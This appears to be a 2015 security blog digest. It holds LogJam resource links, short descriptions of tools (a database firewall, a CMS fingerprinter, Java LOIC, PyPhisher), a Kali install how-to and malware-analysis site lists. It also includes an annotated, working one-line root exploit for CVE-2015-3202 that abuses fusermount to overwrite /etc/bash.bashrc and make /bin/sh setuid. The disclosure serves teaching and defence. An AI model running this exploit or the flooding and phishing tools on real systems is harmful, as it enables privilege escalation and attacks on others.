May 22, 2015

Resource for LogJam Vulnerability

http://www.cryptologie.net/article/270/the-logjam-attack/
https://www.virusbtn.com/blog/2015/05_20.xml
https://weakdh.org/

Detect
https://openssl.org/blog/blog/2015/05/20/logjam-freak-upcoming-changes/
https://danielmiessler.com/blog/check-logjam-nmap/

(By taviso) Making a demo exploit for CVE-2015-3202 on Ubuntu fit in a tweet

# Here's how it works, $a holds the name of a shellscript to be executed as
# root.
a=/tmp/.$$;
 
# $b is used twice, first to build the contents of shellscript $a, and then as
# a command to make $a executable. Quotes are unused to save a character, so
# the seperator must be escaped.
b=chmod\ u+sx;
 
# Build the shellscript $a, which should contain "chmod u+sx /bin/sh", making
# /bin/sh setuid root. This only works on Debian/Ubuntu because they use dash,
# and dont make it drop privileges.
#
# http://www.openwall.com/lists/oss-security/2013/08/22/12
#
echo $b /bin/sh>$a;
 
# Now make the $a script executable using the command in $b. This needlessly
# sets the setuid bit, but that doesn't do any harm.
$b $a;
 
# Now make $a the directory we want fusermount to use. This directory name is
# written to an arbitrary file as part of the vulnerability, so needs to be
# formed such that it's a valid shell command.
a+=\;$a;
 
# Create the mount point for fusermount.
mkdir -p $a;
 
# fusermount calls setuid(geteuid()) to reset the ruid when it invokes
# /bin/mount so that it can use privileged mount options that are normally
# restricted if ruid != euid. That's acceptable (but scary) in theory, because
# fusermount can sanitize the call to make sure it's safe.
#
# However, because mount thinks it's being invoked by root, it allows
# access to debugging features via the environment that would not normally be
# safe for unprivileged users and fusermount doesn't sanitize them.
#
# Therefore, the bug is that the environment is not cleared when calling mount
# with ruid=0. One debugging feature available is changing the location of
# /etc/mtab by setting LIBMOUNT_MTAB, which we can abuse to overwrite arbitrary
# files.
#
# In this case, I'm trying to overwrite /etc/bash.bashrc (using the name of the
# current shell from $0...so it only works if you're using bash!).
#
# The line written by fusermount will look like this:
#
# /dev/fuse /tmp/.123;/tmp/.123 fuse xxx,xxx,xxx,xxx
#
# Which will try to execute /dev/fuse with the paramter /tmp/_, fail because
# /dev/fuse is a device node, and then execute /tmp/_ with the parameters fuse
# xxx,xxx,xxx,xxx. This means executing /bin/sh will give you a root shell the
# next time root logs in.
#
# Another way to exploit it would be overwriting /etc/default/locale, then
# waiting for cron to run /etc/cron.daily/apt at midnight. That means root
# wouldn't have to log in, but you would have to wait around until midnight to
# check if it worked.
#
# And we have enough characters left for a hash tag/comment.
LIBMOUNT_MTAB=/etc/$0.$0rc _FUSE_COMMFD=0 fusermount $a #CVE-2015-3202 
 

May 19, 2015

Tools: SQLassie - database firewall

SQLassie is a database firewall that detects and prevents SQL injection attacks at runtime.

Usage

SQLassie currently only supports MySQL. To start SQLassie, you'll need to configure how SQLassie connects to the MySQL server, start SQLassie listening on a different port that is now protected, and then configure your applications to connect through this alternate port instead of directly to MySQL.
As an example, consider a scenario where you have a MySQL database engine running and listening for connections on the domain socket /var/run/mysql/mysqld.sock and are running a MediaWiki installation.
First, start SQLassie using
./sqlassie -s /var/run/mysql/mysqld.sock -l 3307
Then, edit MediaWiki's configuration file LocalSettings.php connect to port 3307.
$wgDBServer = "127.0.0.1:3307"
Note that you can't use localhost here; by default, MySQL interprets localhost as a request to use the direct database domain socket connection, and most web applications behave this way as well. Therefore, you have to use the explicit string 127.0.0.1 in order to force connections to go through the TCP port. Check your application's documentation for more information.

Source:: https://github.com/bskari/sqlassie

Tools: WIG - WebApp Information Gatherer

wig is a web application information gathering tool, which can identify numerous Content Management Systems and other administrative applications.
The application fingerprinting is based on checksums and string matching of known files for different versions of CMSes. This results in a score being calculated for each detected CMS and its versions. Each detected CMS is displayed along with the most probable version(s) of it. The score calculation is based on weights and the amount of "hits" for a given checksum.
wig also tries to guess the operating system on the server based on the 'server' and 'x-powered-by' headers. A database containing known header values for different operating systems is included in wig, which allows wig to guess Microsoft Windows versions and Linux distribution and version.

wig features:
  • CMS version detection by: check sums, string matching and extraction
  • Lists detected package and platform versions such as asp.net, php, openssl, apache
  • Detects JavaScript libraries
  • Operation system fingerprinting by matching php, apache and other packages against a values in wig's database
  • Checks for files of interest such as administrative login pages, readmes, etc
  • Currently the wig's databases include 28,000 fingerprints
  • Reuse information from previous runs (save the cache)
  • Implement a verbose option
  • Remove dependency on 'requests'
  • Support for proxy
  • Proper threading support
  • Included check for known vulnerabilities
Source:: https://github.com/jekyc/wig

Tools: Java LOIC - Low Orbit Ion Cannon. A Java based network stress testing application

Low Orbit Ion Cannon. The project is a Java implementation of LOIC written by Praetox but it's not related with the original project. The main purpose of Java LOIC is testing your network.

Java LOIC should work on most operating systems.

Source:: http://sourceforge.net/projects/javaloic/

May 18, 2015

Howto: Install Parallel Desktop Tool 10 in Kali 1.1.0a

1. Install Kali

2. Download libc-bin, libc6, locales
$ wget "http://ftp.tw.debian.org/debian/pool/main/g/glibc/libc-bin_2.19-18_amd64.deb"
$ wget "http://ftp.us.debian.org/debian/pool/main/g/glibc/libc6_2.19-18_amd64.deb"
$ wget "http://ftp.cn.debian.org/debian/pool/main/g/glibc/locales_2.19-18_all.deb"

3. Install libc package
$ dpkg -B -i libc-bin_2.19-18_amd64.deb libc6_2.19-18_amd64.deb locales_2.19-18_all.deb

3. Download another packages

libtirpc1_0.2.5-1_amd64.deb nfs-common_1.2.8-9_amd64.deb libgssapi-krb5-2_1.12.1+dfsg-19_amd64.deb libkrb5-3_1.12.1+dfsg-19_amd64.deb libkrb5support0_1.12.1+dfsg-19_amd64.deb libkeyutils1_1.5.9-5+b1_amd64.deb libk5crypto3_1.12.1+dfsg-19_amd64.deb

4. Install all of it.
$ dpkg -i libtirpc1_0.2.5-1_amd64.deb nfs-common_1.2.8-9_amd64.deb libgssapi-krb5-2_1.12.1+dfsg-19_amd64.deb libkrb5-3_1.12.1+dfsg-19_amd64.deb libkrb5support0_1.12.1+dfsg-19_amd64.deb libkeyutils1_1.5.9-5+b1_amd64.deb libk5crypto3_1.12.1+dfsg-19_amd64.deb

5. Install parallel tools
Action -> Install Parallels Tools

6. Copy script from cdrom
$ mkdir /mnt/tool
$ cp /media/cdrom/* /mnt/tool

7. Change mode installer
$ cd /mnt/tool
$ chmod +x install install-gui

8. Run installer
$ ./install

9. Done

Tools: PyPhisher – Python Tool for Phishing

Tools for running a phishing campaign may exist in several format. phishing tests can be used during  a penetration testing or a security awareness program to provide users the type of attacks that hackers perform to compromise credentials.
If you are looking to make a phishing testing or demonstration you can check PyPhisher. This tool is python based that provide user a way to send emails with  a customized template that he design. you can have an html format that is similar to any organization and replace the links that you want to send.
The following options are required:
  • –server is for SMTP configuration that you are going to be using to send the email
  • –port is the port conf number that is setup for SMTP
  • –html is the pre-crafted html file that will be used in the email
  • –url_replace is the url you want to replace with on the email
  • –subject is the subject that will appear in the email message
  • –sender is the sender name that will appear on the email example
  • –sendto is to whom you would like to send the email to
According to the author PyPhisher was inspired by SpearPhiser beta by Dave Kennedy from Trustedsec and a feature found in Cobalt Strike by Rapheal Mudge from Strategic Cyber.

Source:: http://www.sectechno.com/pyphisher-python-tool-for-phishing/

Tools: ashttp - Shell command to expose any other command as http.

ashttp provide a simple way to expose any shell command by HTTP. For example, to expose top by HTTP, try : ashttp -p8080 top ; then try http://localhost:8080.

Source:: http://julienpalard.github.io/ashttp/

May 17, 2015

Resource for malware analysis

Malware website list
- http://www.malwaredomainlist.com/mdl.php
- quttera.com/lists/malicious
- www.malwaredomains.com
- malware-traffic-analysis.net
- http://malwareconfig.com/
- http://malwaretips.com/
- http://support.clean-mx.de/clean-mx/viruses
- https://zeltser.com/malware-sample-sources/
- http://www.malwareblacklist.com/showMDL.php
- http://www.selectrealsecurity.com/public-block-lists
- http://malc0de.com/database/


Malware Example
- http://www.malwaredigger.com
- https://www.hybrid-analysis.com
- http://malware.dontneedcoffee.com/
- http://blog.malwaremustdie.org/
- http://contagiodump.blogspot.com/
- http://malshare.com/
- http://www.kernelmode.info/forum/viewforum.php?f=16
- http://www.malware.lu/articles/
- http://www.tekdefense.com/downloads/malware-samples/
- http://ytisf.github.io/theZoo/
- https://malwr.com/
- http://syrianmalware.com/
- malwareconfig.com
- http://www.virusign.com/
- http://virusshare.com/


C&C List
- http://cybercrime-tracker.net/

Hub of resource
- https://github.com/rshipp/awesome-malware-analysis

Example of Volatility with malware
- https://tribalchicken.com.au/security/hunting-malware-through-memory-analysis/#more-950


MWI Analysis
http://blog.0x3a.com/post/117760824504/analysis-of-a-microsoft-word-intruder-sample

OS X Malware Sample
- https://objective-see.com/malware.html

List domain for malwares
- https://zeltser.com/malicious-ip-blocklists/


Online Service
  • Anubis : <a>http://anubis.iseclab.org</a>
  • Comodo : <a>http://camas.comodo.com</a>
  • Malwr : <a>https://malwr.com/submission</a>
  • Threat Expert : <a>http://www.threatexpert.com/submit.aspx</a>
  • Threat Track : <a>http://www.threattracksecurity.com/resources/sandbox-malware-analysis.aspx</a>
  • Vicheck : <a>https://www.vicheck.ca</a>
  • Ceasar: <a> https://avcaesar.malware.lu/ </a>
  • https://zeltser.com/automated-malware-analysis/

Analysis Website
  • <a>AVG LinkScanner Drop Zone</a>: Analyzes the URL in real time for threats (http://www.avg.com.au/resources/web-page-scanner/)
  • <a>BrightCloud URL/IP Lookup</a>: Presents historical reputation data about the website (http://www.brightcloud.com/support/lookup.php)
  • <a>Comodo Web Inspector</a>: Examines the URL in real-time. (http://app.webinspector.com/)
  • <a>Cisco SenderBase</a>: Presents historical reputation data about the website (http://www.senderbase.org/)
  • <a>Cyscon SIRT</a>: Provides historical data for IP addresses, domains and ASNs. (http://www.cyscon-sirt.org/)
  • <a>Is It Hacked</a>: Performs several of its own checks of the URL in real time and consults some blacklists (http://www.isithacked.com/)
  • <a>Norton Safe Web</a>: Presents historical reputation data about the website (http://safeweb.norton.com/)
  • <a>PhishTank</a>: Looks up the URL in its database of known phishing websites (http://www.phishtank.com/)
  • <a>Quttera ThreatSign</a>: Scans the specified URL for the presence of malware (http://quttera.com/)
  • <a>Reputation Authority</a>: Shows reputational data on specified domain or IP address (http://www.reputationauthority.org/)
  • <a>Trend Micro Web Reputation</a>: Presents historical reputation data about the website (http://reclassify.wrs.trendmicro.com/)
  • <a>Unmask Parasites</a>: Looks up the URL in the Google Safe Browsing database  (http://www.unmaskparasites.com/security-report/)
  • <a>URLVoid</a>: Looks up the URL in several website blacklisting services (http://urlvoid.com/)
  • <a>VirusTotal</a>: Looks up the URL in several databases of malicious sites (https://www.virustotal.com/)
  • <a>vURL</a>: Retrieves and displays the source code of the page; looks up its status in several blocklists (http://vurl.mysteryfcm.co.uk/)
  • <a>Wepawet</a>: Analyzes the URL in real time for threats (http://wepawet.iseclab.org/)
  • <a>Zscaler Zulu URL Risk Analyzer</a>: Examines the URL using real-time and historical techniques (http://zulu.zscaler.com/)
From: https://zeltser.com/lookup-malicious-websites/


https://www.youtube.com/playlist?list=PLUFkSN0XLZ-kqYbGpY4Gt_VATd4ytQg-Z
http://www.slideshare.net/grecsl/malware-analysis-101-n00b-to-ninja-in-60-minutes-at-bsideslv-on-august-5-2014

Tips for dynamic analysis
operation of “WriteFile” and “RegSetValue”. These are usually the call made by a malicious executable to write the file onto the disk and to make registry changes.
Double clicking a particular process will yield more information about the process. Some of the important attributes are:
  1. Verify Option. There is a verify option in every process to check whether that binary is signed by the MS or not. Below, the screenshot depicts that this binary is not signed by the MS.
  2. Threads will showcase the number of threads associated with this process.
  3. Strings tab can help in determining whether there is any process replacement occur or not. If two strings are drastically different then the process replacement might have occur. Below, the screenshot shows that strings in the executable both on disk and in memory.